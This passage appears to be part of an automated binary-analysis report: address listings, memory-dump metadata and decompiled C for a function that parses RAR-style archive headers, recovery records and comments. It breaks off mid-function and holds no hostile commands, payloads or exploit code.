0x001bcfce
0x001bcfd4
0x001bcfd6
0x001bcffd
0x001bcfff
0x001bd001
0x001bd003
0x001bd009
0x001bd00f
0x001bd0a9
0x001bd0a9
0x001bd0ac
0x00000000
0x001bd0b2
0x001bd0b2
0x001bd0b8
0x00000000
0x001bd0b8
0x001bd015
0x001bd015
0x001bd015
0x001bd018
0x00000000
0x00000000
0x001bd01a
0x001bd01c
0x001bd01e
0x001bd027
0x001bd027
0x001bd029
0x001bd02f
0x001bd02f
0x001bd03b
0x001bd046
0x001bd049
0x001bd056
0x001bd059
0x001bd05a
0x001bd05b
0x001bd061
0x001bd063
0x001bd069
0x001bd06f
0x00000000
0x00000000
0x00000000
0x00000000
0x001bd071
0x001bd071
0x001bd071
0x001bd073
0x00000000
0x00000000
0x001bd075
0x001bd078
0x001bd132
0x001bd132
0x001bd134
0x001bd13a
0x001bd140
0x001bd141
0x00000000
0x001bd07e
0x001bd07e
0x001bd080
0x001bd082
0x001bd082
0x001bd082
0x001bd08a
0x001bd08d
0x001bd08d
0x001bd093
0x001bd095
0x001bd097
0x001bd09e
0x001bd0a4
0x001bd0a6
0x00000000
0x001bd0a6
0x00000000
0x001bd078
0x00000000
0x001bd071
0x00000000
0x001bd015
0x001bcfd8
0x001bcfd8
0x001bcfda
0x001bcfe0
0x001bcfe7
0x001bcfe7
0x001bcfea
0x001bcfea
0x00000000
0x001bcfda
0x00000000
0x001bd0be
0x001bd0be
0x001bd0bf
0x001bd0bf
0x00000000
0x001bcfc4
0x001bce9d
0x001bce9d
0x001bceaf
0x001bcebe
0x001bcec3
0x001bcec6
0x001bcec8
0x001bcee4
0x001bcee7
0x00000000
0x001bceed
0x001bceed
0x001bcef4
0x00000000
0x001bcefa
0x001bcf00
0x001bcf02
0x001bcf08
0x001bcf08
0x001bcf0a
0x001bcf0a
0x001bcf0c
0x001bcf15
0x001bcf1c
0x001bcf1f
0x001bcf20
0x001bcf22
0x001bcf22
0x00000000
0x001bcf0a
0x001bcef4
0x001bceca
0x001bcecc
0x001bced2
0x001bced8
0x001bced9
0x00000000
0x001bced9
0x001bcec8
0x001bce16
0x001bce16
0x001bce1c
0x001bce1e
0x001bce33
0x001bce36
0x00000000
0x001bce3c
0x001bce3c
0x001bce43
0x00000000
0x001bce49
0x001bce4f
0x001bce51
0x001bce57
0x001bce57
0x001bce59
0x001bce59
0x001bce5b
0x001bce64
0x001bce6b
0x001bce6e
0x001bce6f
0x001bce71
0x001bce71
0x001bcf2a
0x001bcf2a
0x001bcf2c
0x00000000
0x001bcf32
0x001bcf32
0x001bcf38
0x001bcf3b
0x001bce7e
0x001bce85
0x00000000
0x001bcf41
0x001bcf43
0x001bcf49
0x001bcf4f
0x001bcf50
0x001bd147
0x001bd147
0x001bd14e
0x001bd14f
0x001bd150
0x001bd155
0x001bd158
0x001bd158
0x001bcf3b
0x001bcf2c
0x001bce43
0x001bce20
0x001bce20
0x001bce22
0x001bce28
0x001bd0d2
0x001bd0d2
0x001bd0d3
0x001bd0d9
0x001bd0d9
0x001bd0e0
0x001bd0e1
0x001bd0e2
0x001bd0e7
0x001bd0ea
0x001bd0ea
0x001bd0ea
0x001bce1e
0x001bd0ec
0x001bd0ec
0x001bd0ee
0x001bd15c
0x001bd163
0x001bd163
0x001bd163
0x001bd16a
0x001bd16c
0x001bd172
0x001bd173
0x001bd61f
0x001bd61f
0x001bd620
0x001bd621
0x001bd626
0x00000000
0x00000000
0x00000000
0x00000000
0x001bd0f0
0x001bd0f6
0x001bd0f6
0x001bd0fc
0x001bd0fc
0x001bd108
0x00000000
0x001bd108
0x001bcd97
0x001bd629
0x001bd629
0x001bd62f
0x001bd631
0x001bd637
0x001bd63d
0x001bd63f
0x001bd641
0x001bd643
0x001bd643
0x001bd645
0x001bd645
0x001bd64e
0x001bd64f
0x001bd653
0x001bd65a
0x001bd65d
0x001bd65e
0x001bd660
0x001bd660
0x001bd664
0x001bd66a
0x001bd66c
0x001bd672
0x001bd674
0x001bd67a
0x001bd67d
0x001bd690
0x001bd693
0x001bd699
0x001bd6ae
0x001bd6b3
0x001bd67f
0x001bd681
0x001bd688
0x001bd688
0x001bd67d
0x001bd6b6
0x001bd6b6
0x001bd6c6
0x001bd6cf
0x001bd6d0
0x001bd6d2
0x001bd769
0x001bd76b
0x001bd776
0x001bd776
0x001bd778
0x001bd77b
0x001bd77d
0x00000000
0x001bd76d
0x001bd773
0x001bd773
0x001bd6d8
0x001bd6d8
0x001bd6de
0x001bd6e1
0x001bd6e7
0x001bd6ea
0x001bd6f0
0x001bd6f2
0x001bd6f8
0x001bd6fa
0x001bd6fc
0x001bd6fc
0x001bd6fe
0x001bd6fe
0x001bd70b
0x001bd712
0x001bd715
0x001bd716
0x001bd718
0x001bd719
0x001bd719
0x001bd71d
0x001bd723
0x001bd725
0x001bd727
0x001bd72d
0x001bd730
0x001bd744
0x001bd74a
0x001bd75f
0x001bd764
0x001bd732
0x001bd732
0x001bd739
0x001bd739
0x001bd730
0x001bd725
0x001bd783
0x001bd783
0x001bd783
0x001bd78f
0x001bd792
0x001bd798
0x001bd79a
0x001bd79c
0x001bd7a2
0x001bd7a4
0x001bd7a4
0x001bd7a4
0x001bd7a2
0x001bd7a9
0x001bd7aa
0x001bd7ac
0x001bd7ae
0x001bd7ae
0x001bd7b0
0x001bd7b6
0x001bd7bc
0x001bd7be
0x001bd7c4
0x001bd7c4
0x001bd7ca
0x001bd7cc
0x00000000
0x00000000
0x001bd7d2
0x001bd7d4
0x001bd7d6
0x001bd7d6
0x001bd7d8
0x001bd7d8
0x001bd7e8
0x001bd7ef
0x001bd7f2
0x001bd7f3
0x001bd7f5
0x001bd7f5
0x001bd7f9
0x001bd7ff
0x001bd801
0x001bd803
0x001bd809
0x001bd80c
0x001bd81d
0x001bd820
0x001bd826
0x001bd83b
0x001bd840
0x001bd80e
0x001bd80e
0x001bd815
0x001bd815
0x001bd80c
0x001bd851
0x001bd860
0x001bd861
0x001bd861
0x001bd863
0x001bd865
0x001bd865
0x001bd86b
0x001bd86e
0x001bd870
0x001bd872
0x001bd872
0x001bd875
0x001bd876
0x001bd876
0x001bd87b
0x001bd87e
0x001bd882
0x001bd882
0x001bd883
0x001bd885
0x001bd88b
0x001bd891
0x00000000
0x00000000
0x00000000
0x001bd891
0x001bd7c4
0x001bd897
0x001bd897
0x00000000
0x001bd897
0x001bc61c
0x001bc613
0x001bc60a
0x001bc5c1
0x001bc5c5
0x001bc5cd
0x00000000
0x001bc5cf
0x001bc5d5
0x001bc5da
0x001bd8b6
0x001bd8b6
0x001bd8b9
0x001bd8c4
0x001bd8ef
0x001bd8f0
0x001bd8f1
0x001bd8f2
0x001bd8f3
0x001bd8f4
0x001bd8f9
0x001bd901
0x001bd906
0x001bd90c
0x001bd911
0x001bd912
0x001bd912
0x001bd912
0x001bd918
0x001bd919
0x001bd919
0x001bd91c
0x001bd922
0x00000000
0x00000000
0x001bd924
0x001bd929
0x001bd92c
0x001bd92e
0x001bd936
0x001bd938
0x001bd93a
0x001bd93f
0x001bd942
0x001bd948
0x001bd94b
0x001bd94d
0x001bd94d
0x001bd94d
0x001bd94d
0x001bd94b
0x001bd950
0x001bd95c
0x001bd962
0x001bd96a
0x001bd96f
0x001bd970
0x001bd975
0x001bd975
0x001bd975
0x001bd975
0x001bd979
0x001bd979
0x001bd97c
0x001bd983
0x001bd990
0x001bd8c6
0x001bd8c6
0x001bd8c6
0x001bd8d0
0x001bd8d9
0x001bd8de
0x001bd8ec
0x001bd8ec
0x001bd8c4
0x001bc5cd

APIs

__floor_pentium4.LIBCMT ref: 001BC6A4

Strings

1#QNAN, xrefs: 001BD8AA
1#IND, xrefs: 001BD89C
1#SNAN, xrefs: 001BD8A3
1#INF, xrefs: 001BD8B1

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f0243807fa5acf9e63597cc927f61a715ad9e06e3ec411abfe254f9477780328
Instruction ID: a35bed0030ffb5a170b63a4f8cb90747b26ccc32a948738536743b0431c3834a
Opcode Fuzzy Hash: f0243807fa5acf9e63597cc927f61a715ad9e06e3ec411abfe254f9477780328
Instruction Fuzzy Hash: 2DC24D71E086298FDB29DF28DD407EAB7B5EB98305F1541EAD44DE7240E774AE818F80

Uniqueness

Uniqueness Score: -1.00%

Function 00192692, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 783
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00192692(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t333;
				signed int _t337;
				char _t356;
				signed short _t363;
				signed int _t368;
				signed int _t374;
				signed char _t376;
				signed char _t379;
				char _t396;
				signed int _t397;
				signed int _t401;
				signed char _t415;
				intOrPtr _t416;
				char _t417;
				signed int _t420;
				signed int _t421;
				signed char _t426;
				signed int _t429;
				signed int _t433;
				signed short _t438;
				signed short _t443;
				unsigned int _t448;
				signed int _t451;
				void* _t454;
				signed int _t456;
				signed int _t459;
				void* _t466;
				signed int _t472;
				unsigned int _t476;
				void* _t477;
				void* _t484;
				void* _t485;
				signed char _t491;
				signed int _t505;
				intOrPtr* _t518;
				signed int _t521;
				signed int _t522;
				intOrPtr* _t523;
				signed int _t531;
				signed int _t536;
				signed int _t538;
				unsigned int _t547;
				signed int _t549;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				void* _t586;
				signed int _t590;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				unsigned int _t612;
				signed char _t628;
				signed char _t638;
				signed int _t641;
				unsigned int _t642;
				signed int _t645;
				signed int _t646;
				signed int _t648;
				signed int _t649;
				unsigned int _t651;
				signed int _t655;
				void* _t656;
				void* _t663;
				signed int _t666;
				signed int _t667;
				signed char _t668;
				signed int _t671;
				void* _t673;
				signed int _t679;
				signed int _t680;
				void* _t685;
				signed int _t686;
				signed int _t687;
				signed int _t694;
				signed int _t695;
				intOrPtr _t697;
				void* _t698;
				signed char _t707;

				_t523 = __ecx;
				E001AD870(E001C1197, _t698);
				E001AD940();
				_t518 = _t523;
				 *((intOrPtr*)(_t698 + 0x20)) = _t518;
				E0019C223(_t698 + 0x24, _t518);
				 *((intOrPtr*)(_t698 + 0x1c)) = 0;
				 *((intOrPtr*)(_t698 - 4)) = 0;
				_t655 = 7;
				if( *(_t518 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t698 + 0x5f)) = 0;
					L7:
					E0019C42E(_t638, _t655);
					if( *((intOrPtr*)(_t698 + 0x3c)) != 0) {
						 *(_t518 + 0x21e4) = E0019C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f4) = 0;
						_t679 = E0019C251(_t698 + 0x24) & 0x000000ff;
						_t333 = E0019C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21ec) = _t333;
						 *(_t518 + 0x21f4) = _t333 >> 0x0000000e & 0x00000001;
						_t531 = E0019C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f0) = _t531;
						 *(_t518 + 0x21e8) = _t679;
						__eflags = _t531 - _t655;
						if(_t531 >= _t655) {
							_t680 = _t679 - 0x73;
							__eflags = _t680;
							if(_t680 == 0) {
								 *(_t518 + 0x21e8) = 1;
							} else {
								_t694 = _t680 - 1;
								__eflags = _t694;
								if(_t694 == 0) {
									 *(_t518 + 0x21e8) = 2;
								} else {
									_t695 = _t694 - 6;
									__eflags = _t695;
									if(_t695 == 0) {
										 *(_t518 + 0x21e8) = 3;
									} else {
										__eflags = _t695 == 1;
										if(_t695 == 1) {
											 *(_t518 + 0x21e8) = 5;
										}
									}
								}
							}
							_t337 =  *(_t518 + 0x21e8);
							 *(_t518 + 0x21dc) = _t337;
							__eflags = _t337 - 0x75;
							if(_t337 != 0x75) {
								__eflags = _t337 - 1;
								if(_t337 != 1) {
									L23:
									_push(_t531 - 7);
									L24:
									E0019C42E(_t638);
									 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca0)) + E00191901(_t518,  *(_t518 + 0x21f0));
									_t536 =  *(_t518 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t518 + 0x6cac) =  *(_t518 + 0x6ca4);
									 *(_t698 + 0x50) = _t536;
									__eflags = _t536 - 1;
									if(__eflags == 0) {
										_t656 = _t518 + 0x2208;
										E0019A96C(_t656);
										_t538 = 5;
										memcpy(_t656, _t518 + 0x21e4, _t538 << 2);
										 *(_t518 + 0x221c) = E0019C269(_t698 + 0x24);
										_t638 = E0019C29E(_t698 + 0x24);
										 *(_t518 + 0x2220) = _t638;
										 *(_t518 + 0x6cb5) =  *(_t518 + 0x2210) & 0x00000001;
										 *(_t518 + 0x6cb4) =  *(_t518 + 0x2210) >> 0x00000003 & 0x00000001;
										_t547 =  *(_t518 + 0x2210);
										 *(_t518 + 0x6cb7) = _t547 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x6cbb) = _t547 >> 0x00000006 & 0x00000001;
										 *(_t518 + 0x6cbc) = _t547 >> 0x00000007 & 0x00000001;
										__eflags = _t638;
										if(_t638 != 0) {
											L119:
											_t356 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t518 + 0x6cb8)) = _t356;
											 *(_t518 + 0x2224) = _t547 >> 0x00000001 & 0x00000001;
											_t549 = _t547 >> 0x00000004 & 0x00000001;
											__eflags = _t549;
											 *(_t518 + 0x6cb9) = _t547 >> 0x00000008 & 0x00000001;
											 *(_t518 + 0x6cba) = _t549;
											L121:
											_t655 = 7;
											L122:
											_t363 = E0019C34F(_t698 + 0x24, 0);
											__eflags =  *(_t518 + 0x21e4) - (_t363 & 0x0000ffff);
											if( *(_t518 + 0x21e4) == (_t363 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t698 + 0x1c)) =  *((intOrPtr*)(_t698 + 0x3c));
												goto L133;
											}
											_t368 =  *(_t518 + 0x21e8);
											__eflags = _t368 - 0x79;
											if(_t368 == 0x79) {
												goto L132;
											}
											__eflags = _t368 - 0x76;
											if(_t368 == 0x76) {
												goto L132;
											}
											__eflags = _t368 - 5;
											if(_t368 != 5) {
												L130:
												 *((char*)(_t518 + 0x6cc4)) = 1;
												E00196E03(0x1d00e0, 3);
												__eflags =  *((char*)(_t698 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E00196BF5(__eflags, 4, _t518 + 0x1e, _t518 + 0x1e);
												 *((char*)(_t518 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t518 + 0x45ae);
											if( *(_t518 + 0x45ae) == 0) {
												goto L130;
											}
											_t374 =  *((intOrPtr*)( *_t518 + 0x14))() - _t655;
											__eflags = _t374;
											asm("sbb edx, ecx");
											 *((intOrPtr*)( *_t518 + 0x10))(_t374, _t638, 0);
											 *(_t698 + 0x5e) = 1;
											do {
												_t376 = E0019972B(_t518);
												asm("sbb al, al");
												_t379 =  !( ~_t376) &  *(_t698 + 0x5e);
												 *(_t698 + 0x5e) = _t379;
												_t655 = _t655 - 1;
												__eflags = _t655;
											} while (_t655 != 0);
											__eflags = _t379;
											if(_t379 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t356 = 0;
										__eflags =  *(_t518 + 0x221c);
										if( *(_t518 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t518 + 0x21ec) & 0x00008000;
										if(( *(_t518 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca8)) + E0019C29E(_t698 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t536 - 3;
									if(_t536 <= 3) {
										__eflags = _t536 - 2;
										_t64 = (0 | _t536 != 0x00000002) - 1; // -1
										_t663 = (_t64 & 0xffffdcb0) + 0x45d0 + _t518;
										 *(_t698 + 0x48) = _t663;
										E0019A8D2(_t663, 0);
										_t560 = 5;
										memcpy(_t663, _t518 + 0x21e4, _t560 << 2);
										_t685 =  *(_t698 + 0x48);
										_t666 =  *(_t698 + 0x50);
										_t562 =  *(_t685 + 8);
										 *(_t685 + 0x1098) =  *(_t685 + 8) & 1;
										 *(_t685 + 0x1099) = _t562 >> 0x00000001 & 1;
										 *(_t685 + 0x109b) = _t562 >> 0x00000002 & 1;
										 *(_t685 + 0x10a0) = _t562 >> 0x0000000a & 1;
										__eflags = _t666 - 2;
										if(_t666 != 2) {
											L35:
											_t641 = 0;
											__eflags = 0;
											_t396 = 0;
											L36:
											 *((char*)(_t685 + 0x10f0)) = _t396;
											__eflags = _t666 - 2;
											if(_t666 == 2) {
												L39:
												_t397 = _t641;
												L40:
												 *(_t685 + 0x10fa) = _t397;
												_t563 = _t562 & 0x000000e0;
												__eflags = _t563 - 0xe0;
												 *((char*)(_t685 + 0x10f1)) = 0 | _t563 == 0x000000e0;
												__eflags = _t563 - 0xe0;
												if(_t563 != 0xe0) {
													_t642 =  *(_t685 + 8);
													_t401 = 0x10000 << (_t642 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t401 = _t641;
													_t642 =  *(_t685 + 8);
												}
												 *(_t685 + 0x10f4) = _t401;
												 *(_t685 + 0x10f3) = _t642 >> 0x0000000b & 0x00000001;
												 *(_t685 + 0x10f2) = _t642 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t685 + 0x14)) = E0019C29E(_t698 + 0x24);
												 *(_t698 + 0x54) = E0019C29E(_t698 + 0x24);
												 *((char*)(_t685 + 0x18)) = E0019C251(_t698 + 0x24);
												 *(_t685 + 0x1070) = 2;
												 *((intOrPtr*)(_t685 + 0x1074)) = E0019C29E(_t698 + 0x24);
												 *(_t698 + 0x18) = E0019C29E(_t698 + 0x24);
												 *(_t685 + 0x1c) = E0019C251(_t698 + 0x24) & 0x000000ff;
												 *((char*)(_t685 + 0x20)) = E0019C251(_t698 + 0x24) - 0x30;
												 *(_t698 + 0x4c) = E0019C269(_t698 + 0x24) & 0x0000ffff;
												_t415 = E0019C29E(_t698 + 0x24);
												_t645 =  *(_t685 + 0x1c);
												 *(_t698 + 0x58) = _t415;
												 *(_t685 + 0x24) = _t415;
												__eflags = _t645 - 0x14;
												if(_t645 < 0x14) {
													__eflags = _t415 & 0x00000010;
													if((_t415 & 0x00000010) != 0) {
														 *((char*)(_t685 + 0x10f1)) = 1;
													}
												}
												 *(_t685 + 0x109c) = 0;
												__eflags =  *(_t685 + 0x109b);
												if( *(_t685 + 0x109b) == 0) {
													L55:
													_t416 =  *((intOrPtr*)(_t685 + 0x18));
													 *(_t685 + 0x10fc) = 2;
													__eflags = _t416 - 3;
													if(_t416 == 3) {
														L59:
														 *(_t685 + 0x10fc) = 1;
														L60:
														 *(_t685 + 0x1100) = 0;
														__eflags = _t416 - 3;
														if(_t416 == 3) {
															__eflags = ( *(_t698 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t698 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t685 + 0x1100) = 1;
																 *((short*)(_t685 + 0x1104)) = 0;
															}
														}
														__eflags = _t666 - 2;
														if(_t666 == 2) {
															L66:
															_t417 = 0;
															goto L67;
														} else {
															__eflags =  *(_t685 + 0x24);
															if( *(_t685 + 0x24) >= 0) {
																goto L66;
															}
															_t417 = 1;
															L67:
															 *((char*)(_t685 + 0x10f8)) = _t417;
															_t420 =  *(_t685 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t420;
															 *(_t685 + 0x10f9) = _t420;
															if(_t420 == 0) {
																__eflags =  *(_t698 + 0x54) - 0xffffffff;
																_t638 = 0;
																_t667 = 0;
																_t137 =  *(_t698 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t421 = _t420 & 0xffffff00 | _t137;
																L73:
																 *(_t685 + 0x109a) = _t421;
																 *((intOrPtr*)(_t685 + 0x1058)) = 0 +  *((intOrPtr*)(_t685 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t685 + 0x105c)) = _t667;
																asm("adc edx, ecx");
																 *(_t685 + 0x1060) = 0 +  *(_t698 + 0x54);
																__eflags =  *(_t685 + 0x109a);
																 *(_t685 + 0x1064) = _t638;
																if( *(_t685 + 0x109a) != 0) {
																	 *(_t685 + 0x1060) = 0x7fffffff;
																	 *(_t685 + 0x1064) = 0x7fffffff;
																}
																_t426 =  *(_t698 + 0x4c);
																_t668 = 0x1fff;
																 *(_t698 + 0x54) = 0x1fff;
																__eflags = _t426 - 0x1fff;
																if(_t426 < 0x1fff) {
																	_t668 = _t426;
																	 *(_t698 + 0x54) = _t426;
																}
																E0019C300(_t698 + 0x24, _t698 - 0x2030, _t668);
																_t429 = 0;
																__eflags =  *(_t698 + 0x50) - 2;
																 *((char*)(_t698 + _t668 - 0x2030)) = 0;
																if( *(_t698 + 0x50) != 2) {
																	 *(_t698 + 0x50) = _t685 + 0x28;
																	_t432 = E001A0FDE(_t698 - 0x2030, _t685 + 0x28, 0x800);
																	_t671 =  *((intOrPtr*)(_t685 + 0xc)) -  *(_t698 + 0x4c) - 0x20;
																	__eflags =  *(_t685 + 8) & 0x00000400;
																	if(( *(_t685 + 8) & 0x00000400) != 0) {
																		_t671 = _t671 - 8;
																		__eflags = _t671;
																	}
																	__eflags = _t671;
																	if(_t671 <= 0) {
																		_t672 = _t685 + 0x28;
																	} else {
																		 *(_t698 + 0x58) = _t685 + 0x1028;
																		E00191EDE(_t685 + 0x1028, _t671);
																		_t466 = E0019C300(_t698 + 0x24,  *(_t685 + 0x1028), _t671);
																		_t672 = _t685 + 0x28;
																		_t432 = E001B2B69(_t466, _t685 + 0x28, L"RR");
																		__eflags = _t432;
																		if(_t432 == 0) {
																			__eflags =  *((intOrPtr*)(_t685 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t685 + 0x102c)) >= 0x14) {
																				_t673 =  *( *(_t698 + 0x58));
																				asm("cdq");
																				_t602 =  *(_t673 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t604 = (_t602 << 8) + ( *(_t673 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t606 = (_t604 << 8) + ( *(_t673 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t472 = (_t606 << 8) + ( *(_t673 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t518 + 0x21c0) = _t472 << 9;
																				 *(_t518 + 0x21c4) = ((((_t638 << 0x00000020 | _t602) << 0x8 << 0x00000020 | _t604) << 0x8 << 0x00000020 | _t606) << 0x8 << 0x00000020 | _t472) << 9;
																				_t476 = E0019F749( *(_t518 + 0x21c0),  *(_t518 + 0x21c4),  *((intOrPtr*)( *_t518 + 0x14))(), _t638);
																				 *(_t518 + 0x21c8) = _t476;
																				 *(_t698 + 0x58) = _t476;
																				_t477 = E001AD890(_t475, _t638, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t432 = E0019F749(_t477 +  *(_t518 + 0x21c0), _t638, _t475, _t638);
																				_t612 =  *(_t698 + 0x58);
																				_t685 =  *(_t698 + 0x48);
																				_t672 =  *(_t698 + 0x50);
																				__eflags = _t432 - _t612;
																				if(_t432 > _t612) {
																					_t432 = _t612 + 1;
																					 *(_t518 + 0x21c8) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t433 = E001B2B69(_t432, _t672, L"CMT");
																	__eflags = _t433;
																	if(_t433 == 0) {
																		 *((char*)(_t518 + 0x6cb6)) = 1;
																	}
																} else {
																	_t672 = _t685 + 0x28;
																	 *_t672 = 0;
																	__eflags =  *(_t685 + 8) & 0x00000200;
																	if(( *(_t685 + 8) & 0x00000200) != 0) {
																		E001969E0(_t698);
																		_t484 = E001B2BB0(_t698 - 0x2030);
																		_t638 =  *(_t698 + 0x54);
																		_t485 = _t484 + 1;
																		__eflags = _t638 - _t485;
																		if(_t638 > _t485) {
																			__eflags = _t485 + _t698 - 0x2030;
																			E001969F1(_t698, _t698 - 0x2030, _t638, _t485 + _t698 - 0x2030, _t638 - _t485, _t672, 0x800);
																		}
																		_t429 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t672 - _t429;
																	if( *_t672 == _t429) {
																		_push(1);
																		_push(0x800);
																		_push(_t672);
																		_push(_t698 - 0x2030);
																		E0019F79F();
																	}
																	E00191F3D(_t518, _t685);
																}
																__eflags =  *(_t685 + 8) & 0x00000400;
																if(( *(_t685 + 8) & 0x00000400) != 0) {
																	E0019C300(_t698 + 0x24, _t685 + 0x10a1, 8);
																}
																E001A08B2( *(_t698 + 0x18));
																__eflags =  *(_t685 + 8) & 0x00001000;
																if(( *(_t685 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t518 + 0x6ca8)) = E00193CA7( *((intOrPtr*)(_t518 + 0x6ca8)),  *(_t518 + 0x6cac),  *((intOrPtr*)(_t685 + 0x1058)),  *((intOrPtr*)(_t685 + 0x105c)), 0, 0);
																	 *(_t518 + 0x6cac) = _t638;
																	 *((char*)(_t698 + 0x20)) =  *(_t685 + 0x10f2);
																	_t438 = E0019C34F(_t698 + 0x24,  *((intOrPtr*)(_t698 + 0x20)));
																	__eflags =  *_t685 - (_t438 & 0x0000ffff);
																	if( *_t685 != (_t438 & 0x0000ffff)) {
																		 *((char*)(_t518 + 0x6cc4)) = 1;
																		E00196E03(0x1d00e0, 1);
																		__eflags =  *((char*)(_t698 + 0x5f));
																		if(__eflags == 0) {
																			E00196BF5(__eflags, 0x1c, _t518 + 0x1e, _t672);
																		}
																	}
																	goto L121;
																} else {
																	_t443 = E0019C269(_t698 + 0x24);
																	 *((intOrPtr*)(_t698 + 4)) = _t518 + 0x32c0;
																	 *((intOrPtr*)(_t698 + 8)) = _t518 + 0x32c8;
																	 *((intOrPtr*)(_t698 + 0xc)) = _t518 + 0x32d0;
																	__eflags = 0;
																	_t686 = 0;
																	 *((intOrPtr*)(_t698 + 0x10)) = 0;
																	_t448 = _t443 & 0x0000ffff;
																	 *(_t698 + 0x4c) = 0;
																	 *(_t698 + 0x58) = _t448;
																	do {
																		_t586 = 3;
																		_t521 = _t448 >> _t586 - _t686 << 2;
																		__eflags = _t521 & 0x00000008;
																		if((_t521 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t698 + 4 + _t686 * 4);
																		if( *(_t698 + 4 + _t686 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t686;
																		if(__eflags != 0) {
																			E001A08B2(E0019C29E(_t698 + 0x24));
																		}
																		E001A06E0( *(_t698 + 4 + _t686 * 4), _t638, __eflags, _t698 - 0x30);
																		__eflags = _t521 & 0x00000004;
																		if((_t521 & 0x00000004) != 0) {
																			_t249 = _t698 - 0x1c;
																			 *_t249 =  *(_t698 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t590 = 0;
																		 *(_t698 - 0x18) = 0;
																		_t522 = _t521 & 0x00000003;
																		__eflags = _t522;
																		if(_t522 <= 0) {
																			L109:
																			_t451 = _t590 * 0x64;
																			__eflags = _t451;
																			 *(_t698 - 0x18) = _t451;
																			E001A0910( *(_t698 + 4 + _t686 * 4), _t638, _t698 - 0x30);
																			_t448 =  *(_t698 + 0x58);
																		} else {
																			_t454 = 3;
																			_t456 = _t454 - _t522 << 3;
																			__eflags = _t456;
																			 *(_t698 + 0x18) = _t456;
																			_t687 = _t456;
																			do {
																				_t459 = (E0019C251(_t698 + 0x24) & 0x000000ff) << _t687;
																				_t687 = _t687 + 8;
																				_t590 =  *(_t698 - 0x18) | _t459;
																				 *(_t698 - 0x18) = _t590;
																				_t522 = _t522 - 1;
																				__eflags = _t522;
																			} while (_t522 != 0);
																			_t686 =  *(_t698 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t686 = _t686 + 1;
																		 *(_t698 + 0x4c) = _t686;
																		__eflags = _t686 - 4;
																	} while (_t686 < 4);
																	_t518 =  *((intOrPtr*)(_t698 + 0x20));
																	_t685 =  *(_t698 + 0x48);
																	goto L112;
																}
															}
															_t667 = E0019C29E(_t698 + 0x24);
															_t491 = E0019C29E(_t698 + 0x24);
															__eflags =  *(_t698 + 0x54) - 0xffffffff;
															_t638 = _t491;
															if( *(_t698 + 0x54) != 0xffffffff) {
																L71:
																_t421 = 0;
																goto L73;
															}
															__eflags = _t638 - 0xffffffff;
															if(_t638 != 0xffffffff) {
																goto L71;
															}
															_t421 = 1;
															goto L73;
														}
													}
													__eflags = _t416 - 5;
													if(_t416 == 5) {
														goto L59;
													}
													__eflags = _t416 - 6;
													if(_t416 < 6) {
														 *(_t685 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t646 = _t645 - 0xd;
													__eflags = _t646;
													if(_t646 == 0) {
														 *(_t685 + 0x109c) = 1;
														goto L55;
													}
													_t648 = _t646;
													__eflags = _t648;
													if(_t648 == 0) {
														 *(_t685 + 0x109c) = 2;
														goto L55;
													}
													_t649 = _t648 - 5;
													__eflags = _t649;
													if(_t649 == 0) {
														L52:
														 *(_t685 + 0x109c) = 3;
